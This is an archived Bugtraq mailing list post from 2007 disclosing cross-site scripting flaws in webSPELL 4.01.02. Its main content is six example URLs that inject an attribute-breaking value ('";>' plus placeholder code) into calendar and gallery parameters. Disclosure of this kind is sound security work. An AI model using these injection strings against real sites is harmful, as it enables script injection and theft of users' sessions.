Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
From: brainheadbrainhead () gmx de
Date: 8 Dec 2007 22:53:59 -0000
###################
Autor: Brainhead                                                        
Type: XSS                                                   
Version:  4.01.02                               
Files: usergallery.php, calendar.php                        
Magic Quotes :off                                         
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=";>[your code]

  By Date           By Thread  

Current thread:
  • webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability brainheadbrainhead (Dec 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]